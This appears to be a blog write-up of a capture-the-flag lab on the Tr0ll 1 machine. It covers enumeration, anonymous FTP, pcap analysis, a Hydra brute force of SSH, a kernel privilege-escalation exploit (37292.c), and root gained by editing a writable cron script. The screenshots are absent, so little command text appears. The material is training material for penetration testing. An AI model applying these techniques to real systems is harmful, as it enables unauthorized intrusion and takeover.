Sunday, September 2, 2018

Tr0ll 1


TR0LL 1

- Layout for this exercise:




1 - INTRODUCTION

The goal of this exercise is the study of the hacking process for the vulnerable machine Tr0ll 1.


- According to the author's description there is a Proof.txt file at the /root directory.

- Tr0ll 1 can be downloaded from here:


-  Once downloaded and extracted with VMware:





2 - ENUMERATION

- Using netdiscover to find the IP corresponding to Tr0ll 1:







- Scanning with Nmap t
here are 3 available services at port 21 (FTP), 22 (SH) and 80 (HTTP):





2.1 - Web service

- Starting with the web service, we detect the presence of the folder /secret and the file robots.txt:




- Same information with nikto:





- Going directly to the website, there is nothing interesting:







- Similar results when checking robots.txt and /secret:










2.2 - FTP Service

- Scanning specifically the port 21 for FTP service, we discover that the anonymous login is allowed:



- Login with anonymous:




- There is a very promising file called lol.pcap:




3 - EXPLOITATION

- Getting the file lol.pcap:








- lol.cap can be also downloaded by using the browser with FTP protocol:








- Opening lol.pcap with Wireshark:







- There is a line about a file called secret_stuff.txt:






- Following the TCP Stream number 0:




- Following the TCP Stream number 2:






- So, we learn that there is an additional directory called sup3rs3cr3tdirlol

- Let's see if we can access it via the browser:



- A file called roflmao is contained, let's download it and see what we can learn about it

- It seems to be a BIN file:













- At this moment there are no execution permissions:




- Giving execution permissions:






- Running the file we find more information:




- Trying 0x0856BF as a web directory, we discover 2 new folders:




- The folder good_luck contains a list of potential usernames:







- About the folder this_folder_contains_the_password there are 2 strings that could be passwords: Pass.txt and Good_job:)





- Let's create a text file for potential usernames:



- Same thing for potential passwords:




- Launching Hydra over SSH service using both wordlists:




- The result is successful for overflow:Pass.txt





- Using overflow:Pass.txt as SSH credentials  we get a remote shell:








- However this shell is of low privilege, so we need privilege escalation to complete the attack:





4 - PRIVILEGE ESCALATION

- Let's try two alternative ways to perform privilege escalation:

4.1 - Exploiting the Operating System

- From previous step we know that Tr0ll 1 is an Ubuntu 14.04 machine with kernel 3.13:




- Googling for an exploit for this version of machine:






- searchsploit helps us to find the privilege escalation exploit:







- The path to find the exploit is:






- Looking for 37292.c:




- Setting a SimpleHTTPServer at port 8000 of the attacker Kali:




- Going to the remote shell at Tr0ll1, let's change to directory /tmp, what is usually writable:




- Downloading 37292.c from Kali:



- Compiling 37292.c:




- Running the executable 37292 we get finally a root shell:




4.2 - Exploiting crontab bad configuration

- It is noticeable that every some minutes the SSH connection is closed by the remote host, sending back a laughing message:





- At the same time the content of /tmp is removed by the remote host:




- These two circumstances make us think that probably a crontab job is working here.

- However, when searching for crontab permissions are denied:







- Looking for writable areas:






- Going to cronlog  we detect the presence of a script called cleaner.py running every 2 minutes via crontab:




- Let.s find it:





- Interestingly, cleaner.py has full root privileges:




- Reading the content of cleaner.py we understand now why tr0ll1 is clearing all content of /tmp every 2 minutes:







- Now, the idea that comes to our mind: why not change the content of the script on our own interest? For instance, providing the user overflow with sudo privileges to run a root shell.

- Let's check that at this moment the user overflow does not have any sudo privileges:



- Editing cleaner.py to assign all sudo editing privileges to the user overflow:






- Waiting until the period expires, tr0ll1 kicks me out of the SSH connection:



- Reconnecting again with SSH:




- Eventually user overflow gives us a root shell:



- Being root we can look deeper into the crontab works to understand what was happening at tr0ll1:













- Every 5 minutes the script lmao.py sends back a teasing message and also kills the session for the user overflow:






5 - CAPTURING THE FLAG

- Going to the /root folder we finally read the flag proof.txt: